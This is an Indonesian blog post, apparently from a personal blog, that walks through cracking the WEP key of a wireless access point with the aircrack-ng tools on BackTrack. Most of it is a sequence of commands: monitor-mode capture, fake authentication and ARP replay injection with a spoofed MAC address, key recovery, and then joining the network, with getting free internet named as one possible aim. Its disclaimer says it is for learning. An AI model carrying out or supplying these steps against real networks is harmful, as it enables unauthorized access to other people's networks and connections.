Mungkin ada yang bertanya, apa itu wep? Dan apa fungsi wep? Apa itu dhcp? Dan lain sebagainya.. tapi kali ini, saya hanya membahas mengenai wep key saja. Pada dasarnya setingan keamanan pada Akses Point (AP) terdiri dari beberapa mode, tetapi rata-rata menggunakan setingan yang simple untuk memudahkan pengaksessan. Karena terkadang semakin tinggi tingkat keamanan maka tingkat kenyamanan semakin berkurang. WEP adalah Wired Eqivalent Privacy, yang panjang key 64 bitnya hanya 10 digit bilangan heksadesimal atau 5 digit alpha-numeric, sedangkan untuk 128 bit key terdiri dari 26 digit heksadesimal atau 13 digit alpha-numeric. Algoritma pemograman wep tergolong ke dalam algoritma RC4, dimana terdapat kelemahan pada ekripsi ini yaitu adanya perulangan byte sehingga memungkinkan untuk dicrack jika variable ivs nya mencukupi. Saat melakukan proses hacking wep, menggunakan OS linuk turunan slackware yaitu backtrack versi 2.0 Final, dan menggunakan laptop Compaq V3103TU Presario V3000 dan menggunakan usb wireless adapter DWL G-122 rec C v.3.0. Secara umum langkah-langkahnya adalah sebagai berikut: Ketikkan: Ifconfig rausb0 Iwconfig rausb0 dengan menggunakan shell ketikkan: airodump-ng rausb0 iwconfig rausb0 mode monitor channel 8 airodump-ng -- channel 8 --ivs -w namafile rausb0 shell ini jangan ditutup sampai mendapatkan key wep pada langkah aircrack-ng 4. Setelah itu, jika aktivitas lan sedikit, artinya tidak ada client yang connect, harus menggunakan Fake Authentification dengan membuka shell baru, lalu ketikkan: Aireplay-ng -1 -30 -e XXXX –a 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0 Lakukan fake authentification sampai muncul balasan jawaban: Authentification successful :) Keep live sending packet Lakukan terus sampai mendapatkan key wep pada langkah aircrack-ng 5 Lalu jalan shell yang lain untuk melakukan injeksi arp request (dalam hal ini hanya card tertentu saja yang mendukung untuk melakukan injeksi), jalankan command: Aireplay-ng -3 –b 00:18:f8:36:83:47 -h (mac address yang di izinkan konek) rausb0 Lalu tinggal menunggu agar paket arp injeksi terkirim dan paket arp request diterima, paket yang diterima berupa paket ivs ini akan tersimpan dalam file pertama tadi di atas ketika menjalan shell airodump-ng -- channel 8 --ivs -w namafile rausb0 aircrack-ng –e XXXXX -b 00:18:f8:36:83:47 (namafile).ivs lalu aircrack-ng ini akan mencari semua kemungkinan key wepnya. Tunggu sampai mendapat display Key Found (B1:92:27:EF:6E) Probability 100% iwconfig rausb0 mode managed –e XXXXX key B1:92:27:EF:6E lalu lakukan otomatisasi dhcp dengan mengetikkan perintah: dhcpcd rausb0 lalu lakukan ping ke salah satu web site misalnya: ping yahoo.com kalo jawaban dari ping TTL=bla bla berarti anda sudah terkoneksi ke internet Untuk membobol wep 64 bit biasanya banyaknya paket yang dibutuhkan sekitar 250 ribu ivs lebih, untuk wep 128 bit 500 ribu atau lebih. Reference: Artikel ini hanya untuk menambah pengetahuan kita mengenai keamanan suatu jaringan, penyalahgunaan terhadap tutorial ini bukan merupakan tanggungjawab penulis.Pada kesempatan ini, sedikit ingin membahas bagaimana seseorang mampu menembus WEP key untuk mendapatkan akses ke dalam jaringan bahkan tidak tertutup kemungkinan untuk menggunakan internet gratis.
Tidak ada komentar:
Posting Komentar